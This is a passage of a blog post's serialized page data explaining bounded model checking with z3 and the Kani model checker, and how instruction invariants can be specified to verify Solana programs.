1\n",[21970],{"type":26,"tag":130,"props":21971,"children":21972},{"__ignoreMap":7},[21973,21996,22012],{"type":26,"tag":137,"props":21974,"children":21975},{"class":5559,"line":5560},[21976,21980,21984,21988,21992],{"type":26,"tag":137,"props":21977,"children":21978},{"style":5601},[21979],{"type":32,"value":21902},{"type":26,"tag":137,"props":21981,"children":21982},{"style":5590},[21983],{"type":32,"value":11161},{"type":26,"tag":137,"props":21985,"children":21986},{"style":5601},[21987],{"type":32,"value":21683},{"type":26,"tag":137,"props":21989,"children":21990},{"style":5590},[21991],{"type":32,"value":356},{"type":26,"tag":137,"props":21993,"children":21994},{"style":5626},[21995],{"type":32,"value":21919},{"type":26,"tag":137,"props":21997,"children":21998},{"class":5559,"line":5412},[21999,22003,22008],{"type":26,"tag":137,"props":22000,"children":22001},{"style":5601},[22002],{"type":32,"value":21902},{"type":26,"tag":137,"props":22004,"children":22005},{"style":5590},[22006],{"type":32,"value":22007},"\u003C=",{"type":26,"tag":137,"props":22009,"children":22010},{"style":5626},[22011],{"type":32,"value":21935},{"type":26,"tag":137,"props":22013,"children":22014},{"class":5559,"line":5417},[22015,22019,22023,22027,22031],{"type":26,"tag":137,"props":22016,"children":22017},{"style":5601},[22018],{"type":32,"value":21943},{"type":26,"tag":137,"props":22020,"children":22021},{"style":5590},[22022],{"type":32,"value":11161},{"type":26,"tag":137,"props":22024,"children":22025},{"style":5601},[22026],{"type":32,"value":7095},{"type":26,"tag":137,"props":22028,"children":22029},{"style":5590},[22030],{"type":32,"value":356},{"type":26,"tag":137,"props":22032,"children":22033},{"style":5626},[22034],{"type":32,"value":22035}," 1\n",{"type":26,"tag":35,"props":22037,"children":22038},{},[22039,22041,22048],{"type":32,"value":22040},"Using the ",{"type":26,"tag":41,"props":22042,"children":22045},{"href":22043,"rel":22044},"https://github.com/Z3Prover/z3",[45],[22046],{"type":32,"value":22047},"z3",{"type":32,"value":22049}," SMT solver, we could check both of these cases like so:",{"type":26,"tag":5512,"props":22051,"children":22055},{"code":22052,"language":22053,"meta":7,"className":22054,"style":7},"from z3 import *\n\nx = Int('x')\ny = Int('y')\nz = Int('z')\n\n# Positive branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y > 100)\ns.add(z == y * 2)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n\n# Negative branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y \u003C= 100)\ns.add(z == y + 1)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n","python","language-python shiki shiki-themes slack-dark",[22056],{"type":26,"tag":130,"props":22057,"children":22058},{"__ignoreMap":7},[22059,22082,22089,22115,22139,22163,22170,22178,22195,22223,22242,22270,22277,22285,22306,22324,22331,22339,22354,22381,22400,22427,22434,22441,22460],{"type":26,"tag":137,"props":22060,"children":22061},{"class":5559,"line":5560},[22062,22067,22072,22077],{"type":26,"tag":137,"props":22063,"children":22064},{"style":5610},[22065],{"type":32,"value":22066},"from",{"type":26,"tag":137,"props":22068,"children":22069},{"style":5601},[22070],{"type":32,"value":22071}," z3 ",{"type":26,"tag":137,"props":22073,"children":22074},{"style":5610},[22075],{"type":32,"value":22076},"import",{"type":26,"tag":137,"props":22078,"children":22079},{"style":5590},[22080],{"type":32,"value":22081}," *\n",{"type":26,"tag":137,"props":22083,"children":22084},{"class":5559,"line":5412},[22085],{"type":26,"tag":137,"props":22086,"children":22087},{"emptyLinePlaceholder":18},[22088],{"type":32,"value":6276},{"type":26,"tag":137,"props":22090,"children":22091},{"class":5559,"line":5417},[22092,22097,22101,22106,22111],{"type":26,"tag":137,"props":22093,"children":22094},{"style":5601},[22095],{"type":32,"value":22096},"x ",{"type":26,"tag":137,"props":22098,"children":22099},{"style":5590},[22100],{"type":32,"value":289},{"type":26,"tag":137,"props":22102,"children":22103},{"style":5601},[22104],{"type":32,"value":22105}," Int(",{"type":26,"tag":137,"props":22107,"children":22108},{"style":6837},[22109],{"type":32,"value":22110},"'x'",{"type":26,"tag":137,"props":22112,"children":22113},{"style":5601},[22114],{"type":32,"value":5742},{"type":26,"tag":137,"props":22116,"children":22117},{"class":5559,"line":5642},[22118,22122,22126,22130,22135],{"type":26,"tag":137,"props":22119,"children":22120},{"style":5601},[22121],{"type":32,"value":21902},{"type":26,"tag":137,"props":22123,"children":22124},{"style":5590},[22125],{"type":32,"value":289},{"type":26,"tag":137,"props":22127,"children":22128},{"style":5601},[22129],{"type":32,"value":22105},{"type":26,"tag":137,"props":22131,"children":22132},{"style":6837},[22133],{"type":32,"value":22134},"'y'",{"type":26,"tag":137,"props":22136,"children":22137},{"style":5601},[22138],{"type":32,"value":5742},{"type":26,"tag":137,"props":22140,"children":22141},{"class":5559,"line":5745},[22142,22146,22150,22154,22159],{"type":26,"tag":137,"props":22143,"children":22144},{"style":5601},[22145],{"type":32,"value":21943},{"type":26,"tag":137,"props":22147,"children":22148},{"style":5590},[22149],{"type":32,"value":289},{"type":26,"tag":137,"props":22151,"children":22152},{"style":5601},[22153],{"type":32,"value":22105},{"type":26,"tag":137,"props":22155,"children":22156},{"style":6837},[22157],{"type":32,"value":22158},"'z'",{"type":26,"tag":137,"props":22160,"children":22161},{"style":5601},[22162],{"type":32,"value":5742},{"type":26,"tag":137,"props":22164,"children":22165},{"class":5559,"line":5850},[22166],{"type":26,"tag":137,"props":22167,"children":22168},{"emptyLinePlaceholder":18},[22169],{"type":32,"value":6276},{"type":26,"tag":137,"props":22171,"children":22172},{"class":5559,"line":5878},[22173],{"type":26,"tag":137,"props":22174,"children":22175},{"style":5564},[22176],{"type":32,"value":22177},"# Positive branch:\n",{"type":26,"tag":137,"props":22179,"children":22180},{"class":5559,"line":5891},[22181,22186,22190],{"type":26,"tag":137,"props":22182,"children":22183},{"style":5601},[22184],{"type":32,"value":22185},"s ",{"type":26,"tag":137,"props":22187,"children":22188},{"style":5590},[22189],{"type":32,"value":289},{"type":26,"tag":137,"props":22191,"children":22192},{"style":5601},[22193],{"type":32,"value":22194}," Solver()\n",{"type":26,"tag":137,"props":22196,"children":22197},{"class":5559,"line":5909},[22198,22203,22207,22211,22215,22219],{"type":26,"tag":137,"props":22199,"children":22200},{"style":5601},[22201],{"type":32,"value":22202},"s.add(y ",{"type":26,"tag":137,"props":22204,"children":22205},{"style":5590},[22206],{"type":32,"value":11161},{"type":26,"tag":137,"props":22208,"children":22209},{"style":5601},[22210],{"type":32,"value":21683},{"type":26,"tag":137,"props":22212,"children":22213},{"style":5590},[22214],{"type":32,"value":356},{"type":26,"tag":137,"props":22216,"children":22217},{"style":5626},[22218],{"type":32,"value":21692},{"type":26,"tag":137,"props":22220,"children":22221},{"style":5601},[22222],{"type":32,"value":5742},{"type":26,"tag":137,"props":22224,"children":22225},{"class":5559,"line":5930},[22226,22230,22234,22238],{"type":26,"tag":137,"props":22227,"children":22228},{"style":5601},[22229],{"type":32,"value":22202},{"type":26,"tag":137,"props":22231,"children":22232},{"style":5590},[22233],{"type":32,"value":13052},{"type":26,"tag":137,"props":22235,"children":22236},{"style":5626},[22237],{"type":32,"value":21729},{"type":26,"tag":137,"props":22239,"children":22240},{"style":5601},[22241],{"type":32,"value":5742},{"type":26,"tag":137,"props":22243,"children":22244},{"class":5559,"line":5939},[22245,22250,22254,22258,22262,22266],{"type":26,"tag":137,"props":22246,"children":22247},{"style":5601},[22248],{"type":32,"value":22249},"s.add(z ",{"type":26,"tag":137,"props":22251,"children":22252},{"style":5590},[22253],{"type":32,"value":11161},{"type":26,"tag":137,"props":22255,"children":22256},{"style":5601},[22257],{"type":32,"value":7095},{"type":26,"tag":137,"props":22259,"children":22260},{"style":5590},[22261],{"type":32,"value":7152},{"type":26,"tag":137,"props":22263,"children":22264},{"style":5626},[22265],{"type":32,"value":10519},{"type":26,"tag":137,"props":22267,"children":22268},{"style":5601},[22269],{"type":32,"value":5742},{"type":26,"tag":137,"props":22271,"children":22272},{"class":5559,"line":6191},[22273],{"type":26,"tag":137,"props":22274,"children":22275},{"emptyLinePlaceholder":18},[22276],{"type":32,"value":6276},{"type":26,"tag":137,"props":22278,"children":22279},{"class":5559,"line":6208},[22280],{"type":26,"tag":137,"props":22281,"children":22282},{"style":5564},[22283],{"type":32,"value":22284},"# check if we can violate the correctness property\n",{"type":26,"tag":137,"props":22286,"children":22287},{"class":5559,"line":6225},[22288,22293,22297,22301],{"type":26,"tag":137,"props":22289,"children":22290},{"style":5601},[22291],{"type":32,"value":22292},"s.add(Not(z ",{"type":26,"tag":137,"props":22294,"children":22295},{"style":5590},[22296],{"type":32,"value":18280},{"type":26,"tag":137,"props":22298,"children":22299},{"style":5626},[22300],{"type":32,"value":21847},{"type":26,"tag":137,"props":22302,"children":22303},{"style":5601},[22304],{"type":32,"value":22305},"))\n",{"type":26,"tag":137,"props":22307,"children":22308},{"class":5559,"line":6238},[22309,22314,22319],{"type":26,"tag":137,"props":22310,"children":22311},{"style":5682},[22312],{"type":32,"value":22313},"print",{"type":26,"tag":137,"props":22315,"children":22316},{"style":5601},[22317],{"type":32,"value":22318},"(s.check()) ",{"type":26,"tag":137,"props":22320,"children":22321},{"style":5564},[22322],{"type":32,"value":22323},"# \"unsat\"\n",{"type":26,"tag":137,"props":22325,"children":22326},{"class":5559,"line":6247},[22327],{"type":26,"tag":137,"props":22328,"children":22329},{"emptyLinePlaceholder":18},[22330],{"type":32,"value":6276},{"type":26,"tag":137,"props":22332,"children":22333},{"class":5559,"line":6270},[22334],{"type":26,"tag":137,"props":22335,"children":22336},{"style":5564},[22337],{"type":32,"value":22338},"# Negative branch:\n",{"type":26,"tag":137,"props":22340,"children":22341},{"class":5559,"line":6279},[22342,22346,22350],{"type":26,"tag":137,"props":22343,"children":22344},{"style":5601},[22345],{"type":32,"value":22185},{"type":26,"tag":137,"props":22347,"children":22348},{"style":5590},[22349],{"type":32,"value":289},{"type":26,"tag":137,"props":22351,"children":22352},{"style":5601},[22353],{"type":32,"value":22194},{"type":26,"tag":137,"props":22355,"children":22356},{"class":5559,"line":6288},[22357,22361,22365,22369,22373,22377],{"type":26,"tag":137,"props":22358,"children":22359},{"style":5601},[22360],{"type":32,"value":22202},{"type":26,"tag":137,"props":22362,"children":22363},{"style":5590},[22364],{"type":32,"value":11161},{"type":26,"tag":137,"props":22366,"children":22367},{"style":5601},[22368],{"type":32,"value":21683},{"type":26,"tag":137,"props":22370,"children":22371},{"style":5590},[22372],{"type":32,"value":356},{"type":26,"tag":137,"props":22374,"children":22375},{"style":5626},[22376],{"type":32,"value":21692},{"type":26,"tag":137,"props":22378,"children":22379},{"style":5601},[22380],{"type":32,"value":5742},{"type":26,"tag":137,"props":22382,"children":22383},{"class":5559,"line":6355},[22384,22388,22392,22396],{"type":26,"tag":137,"props":22385,"children":22386},{"style":5601},[22387],{"type":32,"value":22202},{"type":26,"tag":137,"props":22389,"children":22390},{"style":5590},[22391],{"type":32,"value":22007},{"type":26,"tag":137,"props":22393,"children":22394},{"style":5626},[22395],{"type":32,"value":21729},{"type":26,"tag":137,"props":22397,"children":22398},{"style":5601},[22399],{"type":32,"value":5742},{"type":26,"tag":137,"props":22401,"children":22402},{"class":5559,"line":6363},[22403,22407,22411,22415,22419,22423],{"type":26,"tag":137,"props":22404,"children":22405},{"style":5601},[22406],{"type":32,"value":22249},{"type":26,"tag":137,"props":22408,"children":22409},{"style":5590},[22410],{"type":32,"value":11161},{"type":26,"tag":137,"props":22412,"children":22413},{"style":5601},[22414],{"type":32,"value":7095},{"type":26,"tag":137,"props":22416,"children":22417},{"style":5590},[22418],{"type":32,"value":356},{"type":26,"tag":137,"props":22420,"children":22421},{"style":5626},[22422],{"type":32,"value":7104},{"type":26,"tag":137,"props":22424,"children":22425},{"style":5601},[22426],{"type":32,"value":5742},{"type":26,"tag":137,"props":22428,"children":22429},{"class":5559,"line":6393},[22430],{"type":26,"tag":137,"props":22431,"children":22432},{"emptyLinePlaceholder":18},[22433],{"type":32,"value":6276},{"type":26,"tag":137,"props":22435,"children":22436},{"class":5559,"line":6401},[22437],{"type":26,"tag":137,"props":22438,"children":22439},{"style":5564},[22440],{"type":32,"value":22284},{"type":26,"tag":137,"props":22442,"children":22443},{"class":5559,"line":6433},[22444,22448,22452,22456],{"type":26,"tag":137,"props":22445,"children":22446},{"style":5601},[22447],{"type":32,"value":22292},{"type":26,"tag":137,"props":22449,"children":22450},{"style":5590},[22451],{"type":32,"value":18280},{"type":26,"tag":137,"props":22453,"children":22454},{"style":5626},[22455],{"type":32,"value":21847},{"type":26,"tag":137,"props":22457,"children":22458},{"style":5601},[22459],{"type":32,"value":22305},{"type":26,"tag":137,"props":22461,"children":22462},{"class":5559,"line":6441},[22463,22467,22471],{"type":26,"tag":137,"props":22464,"children":22465},{"style":5682},[22466],{"type":32,"value":22313},{"type":26,"tag":137,"props":22468,"children":22469},{"style":5601},[22470],{"type":32,"value":22318},{"type":26,"tag":137,"props":22472,"children":22473},{"style":5564},[22474],{"type":32,"value":22323},{"type":26,"tag":35,"props":22476,"children":22477},{},[22478,22480,22486,22488,22493],{"type":32,"value":22479},"Both of these cases return ",{"type":26,"tag":130,"props":22481,"children":22483},{"className":22482},[],[22484],{"type":32,"value":22485},"unsat",{"type":32,"value":22487}," meaning z3 could not find a way to violate the correctness property, hence our program is ",{"type":26,"tag":762,"props":22489,"children":22490},{},[22491],{"type":32,"value":22492},"correct",{"type":32,"value":22494}," according to this property.",{"type":26,"tag":118,"props":22496,"children":22498},{"id":22497},"loop-bounds-path-explosion",[22499],{"type":32,"value":22500},"Loop bounds & path explosion",{"type":26,"tag":35,"props":22502,"children":22503},{},[22504,22506,22511,22513,22518],{"type":32,"value":22505},"As you may have noticed, BMC requires us to take ",{"type":26,"tag":762,"props":22507,"children":22508},{},[22509],{"type":32,"value":22510},"every",{"type":32,"value":22512}," branch in the program. To be sure that our property holds, we need to check every possible route through the program. If we have 10 branches in a row we might need to test 2^10 paths! And if our program has loops, we may need to check an ",{"type":26,"tag":762,"props":22514,"children":22515},{},[22516],{"type":32,"value":22517},"infinite",{"type":32,"value":22519}," number of paths because the loop branches backward. This might take a while...",{"type":26,"tag":35,"props":22521,"children":22522},{},[22523],{"type":32,"value":22524},"This is where the \"bounded\" part of \"bounded model checking\" applies. Rather than unroll an infinite number of loops, we can set a loop bound and also verify that it is not possible to loop more than the loop bound.",{"type":26,"tag":35,"props":22526,"children":22527},{},[22528],{"type":32,"value":22529},"While this technique of bounding loops makes the problem tractable. It is still expensive to run BMC on very large programs due to the problem of path explosion. As our program gets larger, the number of possible paths scales potentially exponentially.",{"type":26,"tag":35,"props":22531,"children":22532},{},[22533],{"type":32,"value":22534},"One of the main challenges we will discuss later is how to address this problem of path explosion in the context of Solana Rust programs.",{"type":26,"tag":118,"props":22536,"children":22538},{"id":22537},"kani-model-checker",[22539],{"type":32,"value":22540},"Kani Model Checker",{"type":26,"tag":35,"props":22542,"children":22543},{},[22544,22546,22551],{"type":32,"value":22545},"For our research with formally verifying Solana programs, we are using the ",{"type":26,"tag":41,"props":22547,"children":22549},{"href":21439,"rel":22548},[45],[22550],{"type":32,"value":21443},{"type":32,"value":22552},": an open-source, bit-precise model checker for Rust created at AWS. Under the hood, Kani uses the C Bounded Model Checker (CBMC) to do the heavy lifting.",{"type":26,"tag":35,"props":22554,"children":22555},{},[22556,22558,22563,22565,22571,22572,22578,22580,22586],{"type":32,"value":22557},"Kani allows you to write ",{"type":26,"tag":762,"props":22559,"children":22560},{},[22561],{"type":32,"value":22562},"proof harnesses",{"type":32,"value":22564}," which can invoke Rust functions with symbolic values. These harnesses can ",{"type":26,"tag":130,"props":22566,"children":22568},{"className":22567},[],[22569],{"type":32,"value":22570},"assume",{"type":32,"value":3339},{"type":26,"tag":130,"props":22573,"children":22575},{"className":22574},[],[22576],{"type":32,"value":22577},"assert",{"type":32,"value":22579}," certain conditions about these symbolic values and then you can verify that a proof harness holds via the ",{"type":26,"tag":130,"props":22581,"children":22583},{"className":22582},[],[22584],{"type":32,"value":22585},"cargo kani",{"type":32,"value":22587}," tool (which compiles your proof harness and runs BMC).",{"type":26,"tag":92,"props":22589,"children":22591},{"id":22590},"specification-how-can-we-describe-what-we-want-our-program-to-do",[22592,22594,22598],{"type":32,"value":22593},"Specification: How can we describe what we ",{"type":26,"tag":762,"props":22595,"children":22596},{},[22597],{"type":32,"value":21513},{"type":32,"value":21515},{"type":26,"tag":35,"props":22600,"children":22601},{},[22602],{"type":26,"tag":762,"props":22603,"children":22604},{},[22605],{"type":26,"tag":84,"props":22606,"children":22607},{},[22608],{"type":32,"value":22609},"And what even do we want it to do?",{"type":26,"tag":35,"props":22611,"children":22612},{},[22613,22615,22620],{"type":32,"value":22614},"A fundamental challenge with any formal verification framework is ",{"type":26,"tag":762,"props":22616,"children":22617},{},[22618],{"type":32,"value":22619},"specifying",{"type":32,"value":22621}," what the \"correct\" behavior should be.",{"type":26,"tag":35,"props":22623,"children":22624},{},[22625],{"type":32,"value":22626},"In natural language, we can describe a few good properties for example Solana programs:",{"type":26,"tag":3426,"props":22628,"children":22629},{},[22630,22642,22654],{"type":26,"tag":3430,"props":22631,"children":22632},{},[22633,22635,22640],{"type":32,"value":22634},"\"It should not be possible to ",{"type":26,"tag":84,"props":22636,"children":22637},{},[22638],{"type":32,"value":22639},"steal money",{"type":32,"value":22641}," via a swap program\"",{"type":26,"tag":3430,"props":22643,"children":22644},{},[22645,22647,22652],{"type":32,"value":22646},"\"A multisig should never get into a state where you ",{"type":26,"tag":84,"props":22648,"children":22649},{},[22650],{"type":32,"value":22651},"can't sign anything",{"type":32,"value":22653},"\"",{"type":26,"tag":3430,"props":22655,"children":22656},{},[22657],{"type":32,"value":22658},"\"User funds in a staking protocol \"",{"type":26,"tag":35,"props":22660,"children":22661},{},[22662,22664,22674,22676,22681],{"type":32,"value":22663},"These are types of properties you can tell your ",{"type":26,"tag":41,"props":22665,"children":22668},{"href":22666,"rel":22667},"https://osec.io/",[45],[22669],{"type":26,"tag":762,"props":22670,"children":22671},{},[22672],{"type":32,"value":22673},"human auditors",{"type":32,"value":22675}," but these English phrases are not particularly useful for ",{"type":26,"tag":762,"props":22677,"children":22678},{},[22679],{"type":32,"value":22680},"automated verification techniques",{"type":32,"value":22682}," (at least until our AI overlords surpass human intelligence).",{"type":26,"tag":35,"props":22684,"children":22685},{},[22686,22688,22693,22695,22700],{"type":32,"value":22687},"Instead, we need to be able to specify ",{"type":26,"tag":762,"props":22689,"children":22690},{},[22691],{"type":32,"value":22692},"in code",{"type":32,"value":22694}," what properties we want to check. Ideally, we could define invariants that fit nicely into something like an ",{"type":26,"tag":130,"props":22696,"children":22698},{"className":22697},[],[22699],{"type":32,"value":22577},{"type":32,"value":22701}," statement.",{"type":26,"tag":118,"props":22703,"children":22705},{"id":22704},"solana-invariants",[22706],{"type":32,"value":22707},"Solana Invariants",{"type":26,"tag":35,"props":22709,"children":22710},{},[22711,22713,22718,22719,22724],{"type":32,"value":22712},"In the context of Solana programs we define two different types of properties that we would like to verify: ",{"type":26,"tag":84,"props":22714,"children":22715},{},[22716],{"type":32,"value":22717},"instruction invariants",{"type":32,"value":3339},{"type":26,"tag":84,"props":22720,"children":22721},{},[22722],{"type":32,"value":22723},"account invariants",{"type":32,"value":470},{"type":26,"tag":21485,"props":22726,"children":22728},{"id":22727},"instruction-invariant",[22729],{"type":32,"value":22730},"Instruction Invariant",{"type":26,"tag":35,"props":22732,"children":22733},{},[22734,22736,22741,22743,22749,22750,22756],{"type":32,"value":22735},"An ",{"type":26,"tag":84,"props":22737,"children":22738},{},[22739],{"type":32,"value":22740},"instruction invariant",{"type":32,"value":22742}," specifies sufficient conditions for an instruction to succeed (or fail). These are specified as ",{"type":26,"tag":130,"props":22744,"children":22746},{"className":22745},[],[22747],{"type":32,"value":22748},"succeeds_if",{"type":32,"value":15725},{"type":26,"tag":130,"props":22751,"children":22753},{"className":22752},[],[22754],{"type":32,"value":22755},"errors_if",{"type":32,"value":22757}," macro annotations on the instruction handler.",{"type":26,"tag":35,"props":22759,"children":22760},{},[22761],{"type":32,"value":22762},"In Solana, when an instruction fails, the entire transaction is reverted. Failing an instruction on purpose is commonly used as a form of access control; invalid accounts, bad state, etc... will cause an instruction to fail and get reverted.",{"type":26,"tag":35,"props":22764,"children":22765},{},[22766,22768,22774,22776,22781],{"type":32,"value":22767},"For example, say we have a ",{"type":26,"tag":130,"props":22769,"children":22771},{"className":22770},[],[22772],{"type":32,"value":22773},"Withdraw",{"type":32,"value":22775}," instruction that lets a user withdraw some tokens. A security critical property we may want to verify is that the user cannot withdraw ",{"type":26,"tag":762,"props":22777,"children":22778},{},[22779],{"type":32,"value":22780},"more",{"type":32,"value":22782}," tokens than their current balance.",{"type":26,"tag":35,"props":22784,"children":22785},{},[22786,22788,22793],{"type":32,"value":22787},"Using our tool, you could specify the following ",{"type":26,"tag":130,"props":22789,"children":22791},{"className":22790},[],[22792],{"type":32,"value":22755},{"type":32,"value":22794}," property on your instruction handler:",{"type":26,"tag":5512,"props":22796,"children":22798},{"code":22797,"language":5551,"meta":7,"className":5552,"style":7},"#[errors_if(\n    ctx.user.balance \u003C amount\n)]\nfn withdraw(ctx: Context\u003CWithdraw>, amount: u64) -> Result\u003C()> {\n    ...\n}\n",[22799],{"type":26,"tag":130,"props":22800,"children":22801},{"__ignoreMap":7},[22802,22810,22845,22853,22926,22934],{"type":26,"tag":137,"props":22803,"children":22804},{"class":5559,"line":5560},[22805],{"type":26,"tag":137,"props":22806,"children":22807},{"style":5601},[22808],{"type":32,"value":22809},"#[errors_if(\n",{"type":26,"tag":137,"props":22811,"children":22812},{"class":5559,"line":5412},[22813,22818,22822,22827,22831,22836,22840],{"type":26,"tag":137,"props":22814,"children":22815},{"style":5601},[22816],{"type":32,"value":22817},"    ctx",{"type":26,"tag":137,"props":22819,"children":22820},{"style":5590},[22821],{"type":32,"value":470},{"type":26,"tag":137,"props":22823,"children":22824},{"style":5601},[22825],{"type":32,"value":22826},"user",{"type":26,"tag":137,"props":22828,"children":22829},{"style":5590},[22830],{"type":32,"value":470},{"type":26,"tag":137,"props":22832,"children":22833},{"style":5601},[22834],{"type":32,"value":22835},"balance ",{"type":26,"tag":137,"props":22837,"children":22838},{"style":5590},[22839],{"type":32,"value":8391},{"type":26,"tag":137,"props":22841,"children":22842},{"style":5601},[22843],{"type":32,"value":22844}," amount\n",{"type":26,"tag":137,"props":22846,"children":22847},{"class":5559,"line":5417},[22848],{"type":26,"tag":137,"props":22849,"children":22850},{"style":5601},[22851],{"type":32,"value":22852},")]\n",{"type":26,"tag":137,"props":22854,"children":22855},{"class":5559,"line":5642},[22856,22861,22866,22870,22875,22879,22884,22888,22892,22896,22901,22905,22909,22913,22917,22921],{"type":26,"tag":137,"props":22857,"children":22858},{"style":5573},[22859],{"type":32,"value":22860},"fn",{"type":26,"tag":137,"props":22862,"children":22863},{"style":5682},[22864],{"type":32,"value":22865}," withdraw",{"type":26,"tag":137,"props":22867,"children":22868},{"style":5601},[22869],{"type":32,"value":165},{"type":26,"tag":137,"props":22871,"children":22872},{"style":5584},[22873],{"type":32,"value":22874},"ctx",{"type":26,"tag":137,"props":22876,"children":22877},{"style":5590},[22878],{"type":32,"value":7072},{"type":26,"tag":137,"props":22880,"children":22881},{"style":6009},[22882],{"type":32,"value":22883}," Context",{"type":26,"tag":137,"props":22885,"children":22886},{"style":5601},[22887],{"type":32,"value":8391},{"type":26,"tag":137,"props":22889,"children":22890},{"style":6009},[22891],{"type":32,"value":22773},{"type":26,"tag":137,"props":22893,"children":22894},{"style":5601},[22895],{"type":32,"value":9214},{"type":26,"tag":137,"props":22897,"children":22898},{"style":5584},[22899],{"type":32,"value":22900},"amount",{"type":26,"tag":137,"props":22902,"children":22903},{"style":5590},[22904],{"type":32,"value":7072},{"type":26,"tag":137,"props":22906,"children":22907},{"style":6009},[22908],{"type":32,"value":8445},{"type":26,"tag":137,"props":22910,"children":22911},{"style":5601},[22912],{"type":32,"value":5671},{"type":26,"tag":137,"props":22914,"children":22915},{"style":5590},[22916],{"type":32,"value":16348},{"type":26,"tag":137,"props":22918,"children":22919},{"style":6009},[22920],{"type":32,"value":16353},{"type":26,"tag":137,"props":22922,"children":22923},{"style":5601},[22924],{"type":32,"value":22925},"\u003C()> {\n",{"type":26,"tag":137,"props":22927,"children":22928},{"class":5559,"line":5745},[22929],{"type":26,"tag":137,"props":22930,"children":22931},{"style":5590},[22932],{"type":32,"value":22933},"    ...\n",{"type":26,"tag":137,"props":22935,"children":22936},{"class":5559,"line":5850},[22937],{"type":26,"tag":137,"props":22938,"children":22939},{"style":5601},[22940],{"type":32,"value":6507},{"type":26,"tag":5503,"props":22942,"children":22943},{},[22944],{"type":26,"tag":35,"props":22945,"children":22946},{},[22947,22948,22953,22955,22960,22962,22967],{"type":32,"value":19206},{"type":26,"tag":130,"props":22949,"children":22951},{"className":22950},[],[22952],{"type":32,"value":22755},{"type":32,"value":22954}," expression specifies ",{"type":26,"tag":762,"props":22956,"children":22957},{},[22958],{"type":32,"value":22959},"succifient",{"type":32,"value":22961}," but not ",{"type":26,"tag":762,"props":22963,"children":22964},{},[22965],{"type":32,"value":22966},"necessary",{"type":32,"value":22968}," conditions for an instruction to fail. I.e. it imposes a strong lower bound on what the requirements are for an instruction to fail.",{"type":26,"tag":3265,"props":22970,"children":22971},{},[],{"type":26,"tag":35,"props":22973,"children":22974},{},[22975,22977,22982],{"type":32,"value":22976},"Another example is that for ",{"type":26,"tag":762,"props":22978,"children":22979},{},[22980],{"type":32,"value":22981},"crank",{"type":32,"value":22983}," functions — run by unauthenticated users to advance the state of the system, you may want to prove that they never fail. In that case, you could specify an invariant like the following:",{"type":26,"tag":5512,"props":22985,"children":22987},{"code":22986,"language":5551,"meta":7,"className":5552,"style":7},"#[succeeds_if(true)]\nfn my_crank(ctx: Context\u003CCrank>) -> Result\u003C()> {\n    ...\n}\n",[22988],{"type":26,"tag":130,"props":22989,"children":22990},{"__ignoreMap":7},[22991,22999,23053,23060],{"type":26,"tag":137,"props":22992,"children":22993},{"class":5559,"line":5560},[22994],{"type":26,"tag":137,"props":22995,"children":22996},{"style":5601},[22997],{"type":32,"value":22998},"#[succeeds_if(true)]\n",{"type":26,"tag":137,"props":23000,"children":23001},{"class":5559,"line":5412},[23002,23006,23011,23015,23019,23023,23027,23031,23036,23041,23045,23049],{"type":26,"tag":137,"props":23003,"children":23004},{"style":5573},[23005],{"type":32,"value":22860},{"type":26,"tag":137,"props":23007,"children":23008},{"style":5682},[23009],{"type":32,"value":23010}," my_crank",{"type":26,"tag":137,"props":23012,"children":23013},{"style":5601},[23014],{"type":32,"value":165},{"type":26,"tag":137,"props":23016,"children":23017},{"style":5584},[23018],{"type":32,"value":22874},{"type":26,"tag":137,"props":23020,"children":23021},{"style":5590},[23022],{"type":32,"value":7072},{"type":26,"tag":137,"props":23024,"children":23025},{"style":6009},[23026],{"type":32,"value":22883},{"type":26,"tag":137,"props":23028,"children":23029},{"style":5601},[23030],{"type":32,"value":8391},{"type":26,"tag":137,"props":23032,"children":23033},{"style":6009},[23034],{"type":32,"value":23035},"Crank",{"type":26,"tag":137,"props":23037,"children":23038},{"style":5601},[23039],{"type":32,"value":23040},">) ",{"type":26,"tag":137,"props":23042,"children":23043},{"style":5590},[23044],{"type":32,"value":16348},{"type":26,"tag":137,"props":23046,"children":23047},{"style":6009},[23048],{"type":32,"value":16353},{"type":26,"tag":137,"props":23050,"children":23051},{"style":5601},[23052],{"type":32,"value":22925},{"type":26,"tag":137,"props":23054,"children":23055},{"class":5559,"line":5417},[23056],{"type":26,"tag":137,"props":23057,"children":23058},{"style":5590},[23059],{"type":32,"value":22933},{"type":26,"tag":137,"props":23061,"children":23062},{"class":5559,"line":5642},[23063],{"type":26,"tag":137,"props":23064,"children":23065},{"style":5601},[23066],{"type":32,"value":6507},{"type":26,"tag":35,"props":23068,"children":23069},{},[23070,23072,23076,23078,23084],{"type":32,"value":23071},"With this invariant, you could prove that the function ",{"type":26,"tag":762,"props":23073,"children":23074},{},[23075],{"type":32,"value":15685},{"type":32,"value":23077}," returns ",{"type":26,"tag":130,"props":23079,"children":23081},{"className":23080},[],[23082],{"type":32,"value":23083},"Ok",{"type":32,"value":23085},". This type of construction could help avoid possible denial of service attacks if a crank could get \"stuck.\"",{"type":26,"tag":3265,"props":23087,"children":23088},{},[],{"type":26,"tag":35,"props":23090,"children":23091},{},[23092,23094,23099,23100,23105,23107,23112,23114,23119,23121,23126],{"type":32,"value":23093},"Note that ",{"type":26,"tag":130,"props":23095,"children":23097},{"className":23096},[],[23098],{"type":32,"value":22748},{"type":32,"value":3339},{"type":26,"tag":130,"props":23101,"children":23103},{"className":23102},[],[23104],{"type":32,"value":22755},{"type":32,"value":23106}," are both implications and not biconditionals. That is, a function may succeed even if ",{"type":26,"tag":130,"props":23108,"children":23110},{"className":23109},[],[23111],{"type":32,"value":22748},{"type":32,"value":23113}," is not satisfied and a function may fail even if ",{"type":26,"tag":130,"props":23115,"children":23117},{"className":23116},[],[23118],{"type":32,"value":22755},{"type":32,"value":23120}," is not satisfied. If you want to prove the ",{"type":26,"tag":762,"props":23122,"children":23123},{},[23124],{"type":32,"value":23125},"exact condition",{"type":32,"value":23127}," required for an instruction to succeed, you could use a form like the following:",{"type":26,"tag":5512,"props":23129,"children":23131},{"code":23130,"language":5551,"meta":7,"className":5552,"style":7},"fn my_invariant(...) -> bool { ... }\n\n#[succeeds_if(my_invariant(...))]\n#[errors_if(!my_invariant(...))]\nfn my_instruction(ctx: Context\u003C...>) -> Result\u003C()> {\n    